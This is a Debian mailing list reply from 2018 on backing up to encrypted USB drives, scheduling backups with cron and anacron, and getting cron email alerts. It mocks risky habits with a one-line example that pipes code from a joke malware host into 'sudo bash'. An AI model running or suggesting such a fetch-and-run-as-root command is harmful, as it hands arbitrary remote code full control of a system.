Re: how to backup to an encrypted usb drive?

To: debian-user@lists.debian.org
Subject: Re: how to backup to an encrypted usb drive?
From: Reco <recoverym4n@enotuniq.net>
Date: Thu, 15 Nov 2018 20:12:19 +0300
Message-id: <[🔎] E1gNLBj-00054r-RJ@enotuniq.net>
In-reply-to: <[🔎] CAD8GWsswu+aGwKotKA8vWmLn816iqN=9qEcXTsiZg-vYksZ-0Q@mail.gmail.com>
References: <[🔎] CAD8GWssJoEp6xzfKk+NNoDbG6WHtJqDrcwAK6PQeyzUFnAXkvA@mail.gmail.com> <[🔎] E1gMwmJ-0001Ym-GE@enotuniq.net> <[🔎] CAD8GWsvhr-VTAt0OSUR8g6VtGCS+SMuQ4npMUPDvGG3SC=NCsQ@mail.gmail.com> <[🔎] E1gMy9t-0001dV-8H@enotuniq.net> <[🔎] CAD8GWsvqV1Fv-s=O4h_mKCVU2q=Z0RnVB1tewH2HPaNOzyJvHA@mail.gmail.com> <[🔎] E1gMzs6-0001pW-1P@enotuniq.net> <[🔎] CAD8GWssGnSjKTumtRYxqNGE1UUqAKdGOEWn_2vhM=-6DRJ6PWw@mail.gmail.com> <[🔎] E1gN9sM-0002Z8-Ci@enotuniq.net> <[🔎] CAD8GWsswu+aGwKotKA8vWmLn816iqN=9qEcXTsiZg-vYksZ-0Q@mail.gmail.com>

	Hi.

On Thu, Nov 15, 2018 at 10:43:30AM -0500, Lee wrote:
> On 11/15/18, Reco <recoverym4n@enotuniq.net> wrote:
> > 	Hi.
> 
> Hi.
> 
> > On Wed, Nov 14, 2018 at 05:03:53PM -0500, Lee wrote:
> >> > b) You do not keep a single backup.
> >> >
> >> > Besides, avoiding all those cryptolockers is easy. You just need to
> >> > learn to distinguish a trusted software from the untrusted. A trusted
> >> > software comes to you with your OS (in this case - Debian main
> >> > archive).
> >> > An untrusted software comes from elsewhere. Keep to a trusted software
> >> > and you'll be fine.
> >>
> >> Most probably.  But I think using Firefox comes with a certain amount
> >> of risk - probably not all that much on debian but still a risk; as
> >> does having an all-the-time online backup.
> >
> > Using any browser comes with the same amount of risk, in fact.
> > But if the regular user cannot overwrite the backups - there's little
> > harm in that.
> 
> But malware can overwrite users files which then get backed up..

Assuming you obtained a working sample of said malware and they
convinced you to run it - it's true.

But then again, there's people who apparently lose sleep and appetite if
they don't run that random binary obtained from the nearest warez dump
at least one per day ;)
Or, considering themselves Modern™, do something really dumb like:
curl 1337.haxor.siet/malware.here | sudo bash

I know one sure way to beat the user who's determined to inflict
themselves the harm, and that's called 'hourly filesystem snaphosts'.
Sadly it requires using certain controversial filesystems and does not
fits with everyone's definition of performance.


> implying you keep lots of backups.  For how long?

Depends. Backups of your 1-2 GB of root/var can be kept for a year,
given weekly backups and a typical multi TB NAS.
Private user's data can be measured in terabytes, so keeping more than a
couple of backups is problematic.


> >> > Avoiding human mistakes is impossible indeed, hence the backups. And
> >> > filesystem snapshots, but that's a different matter.
> >> >
> >> >
> >> >> > And, I'm strong believer of 'machine works, human thinks' principle.
> >> >> > Automating backups to NFS (and replicating them from there) is
> >> >> > simple.
> >> >> > Automating backup to USB drive - that's something that cannot be
> >> >> > done
> >> >> > without human intervention.
> >> >> >
> >> >> >> In other words, what am I missing?
> >> >
> >> > A good backup is run by cron. A bad backup is run manually.
> >> > Simple as that.
> 
> If I ever put debian on something I don't turn off then cron is an
> option.  But right now I've got debian on a laptop that I don't leave
> running 24x7

anacron is the answer for that. It even takes into the account whenever
the laptop is on battery or on AC.


> >> How do you check that your cron backups worked?  Which is assuming you
> >> do check :)
> >> The manual backups I do are fast enough that I can watch and see that
> >> nothing went wrong.
> >
> > Cron can and will send a e-mail to a pre-determined address, if a batch
> > job writes something to stdout/stderr.
> > So then you do a backup, you have two choices:
> >
> > a) Log all and everything, and get your e-mail every day.
> > b) Log errors only and get your e-mail only if something goes wrong.
> >
> > I prefer the latter, but YMMV.
> 
> I prefer getting email every day - with a "no problems" subject line
> if all goes right.  There's been times at work when something goes
> wrong & part of the something was mail on the cron server.
> 
> I just tried running a cron job that fails (didn't chmod +x thescript).  No mail

That's a customary way to disable a cronjob so no surprises here.
Try running something with runtime output, such as:

#!/bin/sh
echo Hello cron world
exit 1


> Yeah.. I know.  Someday.  But setting up mail is way down on my
> priority list somewhere after "install debian on a machine I'll leave
> running 24x7" and I'm still working on "figure out how to dump
> windows."

Stock exim4 is more than enough for the typical 'local delivery'
scenario. They even provide a nice debconf frontend to a package.

Reco

Reply to:

Follow-Ups:
- Re: how to backup to an encrypted usb drive?
  - From: Lee <ler762@gmail.com>

References:
- how to backup to an encrypted usb drive?
  - From: Lee <ler762@gmail.com>
- Re: how to backup to an encrypted usb drive?
  - From: Reco <recoverym4n@enotuniq.net>
- Re: how to backup to an encrypted usb drive?
  - From: Lee <ler762@gmail.com>
- Re: how to backup to an encrypted usb drive?
  - From: Reco <recoverym4n@enotuniq.net>
- Re: how to backup to an encrypted usb drive?
  - From: Lee <ler762@gmail.com>
- Re: how to backup to an encrypted usb drive?
  - From: Reco <recoverym4n@enotuniq.net>
- Re: how to backup to an encrypted usb drive?
  - From: Lee <ler762@gmail.com>
- Re: how to backup to an encrypted usb drive?
  - From: Reco <recoverym4n@enotuniq.net>
- Re: how to backup to an encrypted usb drive?
  - From: Lee <ler762@gmail.com>

Prev by Date: Failed to load libGL
Next by Date: Re: ssh
Previous by thread: Re: how to backup to an encrypted usb drive?
Next by thread: Re: how to backup to an encrypted usb drive?
Index(es):
- Date
- Thread